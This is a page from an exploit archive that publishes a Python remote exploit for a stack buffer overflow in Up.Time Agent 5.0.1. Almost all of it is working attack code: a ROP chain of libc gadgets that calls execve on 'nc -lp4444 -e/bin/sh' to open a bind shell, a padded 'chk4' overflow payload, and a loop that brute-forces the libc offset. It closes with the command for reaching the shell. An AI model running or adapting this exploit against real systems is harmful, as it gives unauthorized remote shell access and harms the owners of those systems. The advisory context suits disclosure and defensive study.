Uptime Agent 5.0.1 Stack Overflow Vulnerability

2013.12.01
Credit: Denis Andzakovic
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Up.Time Agent 5.0.1 Stack Overflow # Date: 28/11/2013 # Exploit Author: Denis Andzakovic # Vendor Homepage: http://www.uptimesoftware.com/ # Version: 5.0.1 # Tested on: Debian 7 (Kernel 3.2.0), Kali (Kernel 3.7) ( , ) (, . '.' ) ('. ', ). , ('. ( ) ( (_,) .'), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. Uptime Agent 5.0.1 Stack Overflow Vulnerability Affected versions: Uptime Agent 5.0.1 (i386) PDF: http://www.security-assessment.com/files/documents/advisory/Up.Time%20Agent%205.0.1%20Stack%20Overflow.pdf #!/usr/bin/python # # Stack based buffer overflow in Up.Time Agent 5.0.1 (i386). # This exploit will create a bind shell running on port # 4444 on the targeted host. # # Author: Denis Andzakovic # Date: 30/10/2013 # import socket import sys import time import argparse from struct import pack def copyBytes(string, location): pcaret = 0xd8f30 # pop ecx ; pop eax ;; movbyte = 0x29ecf # mov [eax] ecx ;; chain = pack("<I",pcaret+libcOffset) chain += str(string) chain += pack("<I",location) chain += pack("<I",movbyte+libcOffset) return chain def copyNullByte(location): # NOTE: eax *MUST* be null before hitting this chain. popedx = 0x1a9e # pop edx ;; nullcpy = 0x11f98d # mov [edx] al ; pop ebx ;; chain = pack("<I",popedx+libcOffset) chain += pack("<I",location) # address of NULL chain += pack("<I",nullcpy+libcOffset) chain += "BEES" # padding return chain def sendSploit(ip, port, libcOffset): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) customstack = 0x0804d380 # gadgets! pcaret = 0xd8f30 # pop ecx ; pop eax ;; popebx = 0x78af4 # pop ebx ;; movbyte = 0x29ecf # mov [eax] ecx ;; xoreax = 0x796bf # xor eax eax ;; popedx = 0x1a9e # pop edx ;; pcdret = 0x2a6eb # pop ecx ; pop edx ;; addeax = 0x7faa8 # add eax 0xb ;; callsys = 0xa10f5 # call gs:[0x10] ;; nullcpy = 0x11f98d # mov [edx] al ; pop ebx ;; # We will be executing "/bin//nc -lp4444 -e/bin/sh" using execve. # Arguments passed to execve will be loaded at our custom stack location rop = copyBytes("/bin",customstack) rop += copyBytes("//nc",customstack+4) rop += copyBytes("-lp4",customstack+9) rop += copyBytes("444A",customstack+13) rop += copyBytes("-e/b",customstack+17) rop += copyBytes("in/b",customstack+21) rop += copyBytes("shAA",customstack+24) # Set up the pointer array for execve() rop += copyBytes(pack("<I",customstack),customstack+27) rop += copyBytes(pack("<I",customstack+9),customstack+31) rop += copyBytes(pack("<I",customstack+17),customstack+35) # Set up Null bytes rop += pack("<I",xoreax+libcOffset) rop += copyNullByte(customstack+8) rop += copyNullByte(customstack+16) rop += copyNullByte(customstack+26) rop += copyNullByte(customstack+39) rop += copyNullByte(customstack+40) rop += copyNullByte(customstack+41) rop += copyNullByte(customstack+42) # Load parameters into relevant registers and Call execve rop += pack("<I",pcdret+libcOffset) rop += pack("<I",customstack+27) rop += pack("<I",customstack+39) rop += pack("<I",popebx+libcOffset) rop += pack("<I",customstack) rop += pack("<I",xoreax+libcOffset) rop += pack("<I",addeax+libcOffset) rop += pack("<I",callsys+libcOffset) rop += "AAAA" djubre = "chk4 " + "A"*243 s.sendall(djubre + rop) data = s.recv(1024) s.close() parser = argparse.ArgumentParser(description='Uptime Agent 5.0.1 CHK4 Buffer Overflow') parser.add_argument('-d','--host', help="IP Address of target machine", required=True) parser.add_argument('-p','--port', help="Port of target machine", required=True) args = parser.parse_args() spinnerChars = ["|","/","-","\\","|","/","-","\\"] spinnerIndex = 0 print "[+] Attacking " + args.host + " on port " + args.port libc= 0xb7000 for i in range(0x000,0xfff): libcOffset = (libc+i)*0x1000 print spinnerChars[spinnerIndex] ," - Bruteforcing LibC Offset - ", hex(libcOffset)," \r", sys.stdout.flush() # 0xb7123 = 0xb7123000 sendSploit(args.host,int(args.port),libcOffset) spinnerIndex = spinnerIndex+1 if(spinnerIndex == 8): spinnerIndex = 0 print "\n[+] Completed! Access shell using 'nc <targethost> 4444'"

References:

http://www.security-assessment.com/files/documents/advisory/Up.Time%20Agent%205.0.1%20Stack%20Overflow.pdf


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top